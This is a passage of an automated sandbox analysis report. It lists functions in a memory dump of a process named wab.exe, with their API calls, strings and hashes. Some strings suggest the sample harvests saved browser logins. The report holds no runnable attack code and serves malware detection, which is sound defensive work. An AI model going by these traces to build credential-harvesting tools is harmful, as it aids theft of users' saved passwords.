                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                      Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memchrmemset
                      • String ID: PD$PD
                      • API String ID: 1581201632-2312785699
                      • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                      • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                      Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                      Download Yara Rule
                      APIs
                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                      • GetDC.USER32(00000000), ref: 00409F6E
                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                      • GetParent.USER32(?), ref: 00409FA5
                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                      • String ID:
                      • API String ID: 2163313125-0
                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                      Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$wcslen
                      • String ID:
                      • API String ID: 239872665-3916222277
                      • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                      • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                      Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpywcslen$_snwprintfmemset
                      • String ID: %s (%s)$YV@
                      • API String ID: 3979103747-598926743
                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                      Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                      • wcslen.MSVCRT ref: 0040A6B1
                      • wcscpy.MSVCRT ref: 0040A6C1
                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                      • wcscpy.MSVCRT ref: 0040A6DB
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                      • String ID: Unknown Error$netmsg.dll
                      • API String ID: 2767993716-572158859
                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                      Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • wcscpy.MSVCRT ref: 0040DAFB
                      • wcscpy.MSVCRT ref: 0040DB0B
                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfilewcscpy$AttributesFileString
                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                      • API String ID: 3176057301-2039793938
                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                      Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • out of memory, xrefs: 0042F865
                      • unable to open database: %s, xrefs: 0042F84E
                      • database %s is already in use, xrefs: 0042F6C5
                      • too many attached databases - max %d, xrefs: 0042F64D
                      • database is already attached, xrefs: 0042F721
                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                      • cannot ATTACH database within transaction, xrefs: 0042F663
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                      • API String ID: 1297977491-2001300268
                      • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                      • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                      Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                      • memcpy.MSVCRT ref: 0040EB80
                      • memcpy.MSVCRT ref: 0040EB94
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                      • String ID: ($d
                      • API String ID: 1140211610-1915259565
                      • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                      • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                      Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                      Download Yara Rule
                      APIs
                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                      • Sleep.KERNEL32(00000001), ref: 004178E9
                      • GetLastError.KERNEL32 ref: 004178FB
                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$ErrorLastLockSleepUnlock
                      • String ID:
                      • API String ID: 3015003838-0
                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                      Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00407E44
                      • memset.MSVCRT ref: 00407E5B
                      • _mbscpy.MSVCRT ref: 00407E7E
                      • _mbscpy.MSVCRT ref: 00407ED7
                      • _mbscpy.MSVCRT ref: 00407EEE
                      • _mbscpy.MSVCRT ref: 00407F01
                      • wcscpy.MSVCRT ref: 00407F10
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                      • String ID:
                      • API String ID: 59245283-0
                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                      Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                      Download Yara Rule
                      APIs
                      • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                      • GetLastError.KERNEL32 ref: 0041855C
                      • Sleep.KERNEL32(00000064), ref: 00418571
                      • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                      • GetLastError.KERNEL32 ref: 0041858E
                      • Sleep.KERNEL32(00000064), ref: 004185A3
                      • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$AttributesDeleteErrorLastSleep$??3@
                      • String ID:
                      • API String ID: 3467550082-0
                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                      Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                      • API String ID: 3510742995-3273207271
                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                      Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                      Download Yara Rule
                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                      • memset.MSVCRT ref: 00413ADC
                      • memset.MSVCRT ref: 00413AEC
                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                      • memset.MSVCRT ref: 00413BD7
                      • wcscpy.MSVCRT ref: 00413BF8
                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                      • String ID: 3A
                      • API String ID: 3300951397-293699754
                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                      Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                      • wcslen.MSVCRT ref: 0040D1D3
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • memcpy.MSVCRT ref: 0040D24C
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                      • String ID: strings
                      • API String ID: 3166385802-3030018805
                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                      Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00411AF6
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • wcsrchr.MSVCRT ref: 00411B14
                      • wcscat.MSVCRT ref: 00411B2E
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileModuleNamememsetwcscatwcsrchr
                      • String ID: AE$.cfg$General$EA
                      • API String ID: 776488737-1622828088
                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                      Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040D8BD
                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                      • memset.MSVCRT ref: 0040D906
                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                      • _wcsicmp.MSVCRT ref: 0040D92F
                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                      • String ID: sysdatetimepick32
                      • API String ID: 1028950076-4169760276
                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                      Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: -journal$-wal
                      • API String ID: 438689982-2894717839
                      • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                      • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                      Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                      • EndDialog.USER32(?,00000002), ref: 00405C83
                      • EndDialog.USER32(?,00000001), ref: 00405C98
                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Item$Dialog$MessageSend
                      • String ID:
                      • API String ID: 3975816621-0
                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                      Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                      Download Yara Rule
                      APIs
                      • _wcsicmp.MSVCRT ref: 00444D09
                      • _wcsicmp.MSVCRT ref: 00444D1E
                      • _wcsicmp.MSVCRT ref: 00444D33
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmp$wcslen$_memicmp
                      • String ID: .save$http://$https://$log profile$signIn
                      • API String ID: 1214746602-2708368587
                      • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                      • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                      Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                      • String ID:
                      • API String ID: 2313361498-0
                      • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                      • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                      Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetClientRect.USER32(?,?), ref: 00405F65
                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                      • GetWindow.USER32(00000000), ref: 00405F80
                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$ItemMessageRectSend$Client
                      • String ID:
                      • API String ID: 2047574939-0
                      • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                      • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                      Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                      • String ID:
